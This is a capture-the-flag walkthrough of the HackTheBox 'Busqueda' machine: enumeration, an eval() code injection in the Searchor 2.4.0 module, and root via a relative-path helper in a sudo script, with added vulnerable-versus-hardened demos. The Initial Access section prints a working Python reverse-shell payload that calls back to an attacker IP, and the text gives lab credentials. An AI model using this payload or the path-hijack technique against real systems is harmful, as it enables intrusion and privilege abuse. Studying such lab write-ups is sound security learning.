In this walkthrough, we will be going through the Busqueda room from HackTheBox. This room is rated as Easy on the platform and it consists of Enumeration, Exploitation and Privilege Escalation of a Linux boot2root machine. So, let's get started without any delay.
Machine Info:
Title | Busqueda |
IP address | 10.10.11.208 |
Difficulty | Easy |
OS | Linux |
Description | Busqueda is an Easy difficulty Linux machine. Initial access comes from a code injection vulnerability in a Python module (Searchor), whose search routine passes user input through eval(). For root, credentials found in a Git config file gave access to the local Gitea service; the same password let the svc user run a Python checkup script as root via sudo, and that script was abused to read the root flag. |
Enumeration:
- I started off with a regular nmap scan with service detection and found two ports open – 22 (SSH) and 80 (HTTP). Port 53 showed up as filtered, which is not usable from our side.
$ sudo nmap -sS -sV 10.10.11.208
Nmap scan report for 10.10.11.208
Host is up (0.22s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.52
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.75 seconds
- Browsing to the web server on port 80 redirected to the hostname searcher.htb (also visible in the nmap Service Info line). I added it to my /etc/hosts file and then accessed the application.
- The Searcher application is a web app that builds search queries for a range of search engines and online services. I searched for a test term using Google with "Auto redirect" unchecked, and the application simply returned the search URL it had built for the chosen engine with our term embedded in it.
- Fired up gobuster to look for interesting directories, but apart from the /search endpoint the form already posts to (405 on GET) and a forbidden /server-status, it turned up nothing.
$ gobuster dir -u http://searcher.htb/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://searcher.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/12/01 13:24:51 Starting gobuster in directory enumeration mode
===============================================================
/search               (Status: 405) [Size: 153]
/server-status        (Status: 403) [Size: 277]
===============================================================
2023/12/01 13:26:39 Finished
===============================================================
- Next, I intercepted the search request with Burp Suite. The Server response header revealed the stack: Werkzeug 2.1.2 (the WSGI layer under Flask) on Python 3.10.6. I searched for known exploits against that Werkzeug/Flask version but found nothing useful.
- Next, the page footer caught my attention: it names the Python module the app is built on, Searchor, together with its version, 2.4.0.
- Searching for known issues in that version turned up a public PoC. The weak spot is an eval() call: the module builds the Engine.<name>.search('<query>', ...) expression as a Python source string with the user's term interpolated into it and hands that string to eval(). A single quote in the search term therefore closes the string literal, and whatever follows is evaluated as Python on the server. That is arbitrary code execution, not just a URL builder. Bingo!
Initial Access:
- Next, with a netcat listener waiting on port 4444, I submitted the payload below as the search term. It closes the string literal, adds exec() with a Python reverse shell as a second argument, closes the search() call and comments out the rest of the generated source. That gave a shell as the web user, and the user flag.
', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.2',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#
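To see exactly why that payload works, here is the eval() pattern rebuilt in miniature. This is an added example written for this writeup, not code from the Searchor project or from the machine; the Engine table, URL templates and function names are assumptions so it runs offline. It puts the vulnerable string-building-plus-eval() next to the fix (resolve the engine by name, call search() directly so the query is only ever data) and shows the payload shape above executing code in one and being URL-encoded as text in the other.

```python
"""Reconstruction of the eval() injection pattern behind Searchor 2.4.0.

Added example, not code from the HackTheBox machine or the Searchor project.
Engine, its URL templates and the function names are assumptions so the
snippet runs offline; the pattern (interpolating user input into Python source
that is then passed to eval) is the one the vulnerability relies on.
"""
from urllib.parse import quote_plus

# Side-effect sink: proves that injected code really executed.
HITS = []


class _SearchEngine:
    def __init__(self, base):
        self.base = base

    def search(self, query, copy_url=False, open_web=False):
        # A real engine would also copy/open the URL; here we only build it.
        return self.base + quote_plus(query)


class Engine:
    # Assumed engine table; the real module exposes many more engines.
    Google = _SearchEngine("https://www.google.com/search?q=")
    DuckDuckGo = _SearchEngine("https://duckduckgo.com/?q=")


def vulnerable_search(engine, query, copy_url=False, open_web=False):
    """Vulnerable pattern: the query is interpolated into Python source and
    eval()'d, so a single quote in `query` ends the string literal and the
    remainder of the term is executed as code."""
    return eval(
        f"Engine.{engine}.search('{query}', copy_url={copy_url}, open_web={open_web})"
    )


def safe_search(engine, query, copy_url=False, open_web=False):
    """Hardened equivalent: resolve the engine name against an allowlist and
    call the method directly. `query` is never parsed as code."""
    allowed = {name for name in vars(Engine) if not name.startswith("_")}
    if engine not in allowed:
        raise ValueError(f"unknown engine: {engine}")
    return getattr(Engine, engine).search(query, copy_url=copy_url, open_web=open_web)


def build_payload(python_statement):
    """Shape of the injected search term used above: close the string
    literal, add exec(...) as a second positional argument, close search(),
    and comment out the rest of the generated source with '#'."""
    return f"', exec(\"{python_statement}\"))#"


if __name__ == "__main__":
    benign = "busqueda htb"
    print(vulnerable_search("Google", benign))
    print(safe_search("Google", benign))

    payload = build_payload("HITS.append('injected')")
    vulnerable_search("Google", payload)
    print("vulnerable:", HITS)   # the statement ran inside eval()
    HITS.clear()
    url = safe_search("Google", payload)
    print("hardened:  ", HITS, url)   # nothing ran; payload is just text
```

The benign term produces the same URL in both versions, which is why the bug is invisible in normal use; only the hardened version keeps that equivalence when the term contains quotes.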
Privilege Escalation:
- To find potential privilege escalation vectors, I uploaded linpeas to the target and ran it.
- The linpeas output flagged some interesting directories containing Git config files. The config of the Flask application's own repository revealed a new virtual host, gitea.searcher.htb, together with a username and password embedded in the remote URL:
cody:jh1usoih2bkjaspwe92
- I added the new domain to my /etc/hosts file and logged into Gitea with those credentials. The repository there had a single commit by the administrator, shown with its SHA-1 hash.
- Moving on, I checked the sudo permissions for the user svc by trying the same password (a classic case of password reuse). The result shows that svc can run the system-checkup.py script as root.
sudo -l
- To see how the script behaves, I ran it with a bogus argument (whoami) and it printed its usage message. It accepts one of three actions: docker-ps, docker-inspect and full-checkup.
- Running the script with full-checkup from my home directory failed. That suggests the full-checkup action invokes a helper script by a relative path rather than an absolute one, so it only works from the directory the helper lives in, and, since sudo keeps the caller's working directory, whoever controls that directory controls what runs as root.
- I created an executable script named full-checkup in /tmp that prints the contents of /root/root.txt, changed into /tmp, and ran system-checkup.py with the full-checkup action through sudo. The script picked up my file instead of the real helper and ran it as root, printing the root flag.
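The relative-path mistake above, rebuilt in miniature so it can be run locally. This is an added example, not the machine's system-checkup.py: it creates two throwaway directories, a "trusted" one holding the legitimate helper and an "attacker" one holding a same-named replacement, and shows that a script invoking ./full-checkup.sh picks up whichever copy sits in the current working directory, while a script that anchors the helper to an absolute path does not. The directory layout, script contents and function names are assumptions for the demo.

```python
"""Relative-path command execution, reconstructed in miniature.

Added example; it is not the Busqueda machine's system-checkup.py. The helper
name, script bodies and function names are assumptions for the demo.
"""
import os
import stat
import subprocess
import tempfile

HELPER = "full-checkup.sh"


def _write_script(directory, body):
    """Write an executable POSIX shell script into `directory`."""
    path = os.path.join(directory, HELPER)
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\n" + body + "\n")
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)
    return path


def run_checkup_vulnerable(cwd):
    """Vulnerable pattern: the helper is invoked by a relative path, which the
    OS resolves against the process's working directory. Under sudo the cwd
    is inherited from the invoking user, so an unprivileged user who can
    chdir into a directory they control chooses what runs as root."""
    result = subprocess.run(["./" + HELPER], cwd=cwd,
                            capture_output=True, text=True)
    return result.stdout.strip()


def run_checkup_hardened(cwd, trusted_dir):
    """Hardened pattern: the helper path is absolute and anchored to a
    directory the caller cannot write to (in a real script, typically
    os.path.dirname(os.path.realpath(__file__))). The cwd is irrelevant."""
    script = os.path.join(trusted_dir, HELPER)
    result = subprocess.run([script], cwd=cwd,
                            capture_output=True, text=True)
    return result.stdout.strip()


def demo():
    """Run both variants from the attacker-controlled directory and return
    (vulnerable_output, hardened_output)."""
    with tempfile.TemporaryDirectory() as trusted, \
         tempfile.TemporaryDirectory() as attacker:
        _write_script(trusted, "echo legitimate-checkup")
        # Stand-in for the writeup's payload, which ran 'cat /root/root.txt'.
        _write_script(attacker, "echo attacker-controlled")
        return (run_checkup_vulnerable(attacker),
                run_checkup_hardened(attacker, trusted))


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("relative path, cwd=/attacker :", vulnerable)
    print("absolute path, cwd=/attacker :", hardened)
```

The same check applies to any sudo rule that grants a script rather than a binary: read the script and look for relative paths, bare command names resolved through PATH, and anything that writes to or reads from a directory the invoking user can control.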
Conclusion:
So that was "Busqueda" for you. We started off with our regular nmap scan and found two ports open – 22 (SSH) and 80 (HTTP). Next, we enumerated the web server on port 80 and found the Searcher application, whose footer revealed it was built on the Searchor 2.4.0 Python module. A known eval() injection in that version gave us initial access. For privilege escalation, we found Gitea credentials in a Git config file; the same password was reused by the svc user, whose sudo rights allowed running system-checkup.py as root. At last, we abused that script's relative path to its full-checkup helper to read the root flag. On that note, I will take your leave and will meet you in the next one. Till then, "Happy hacking".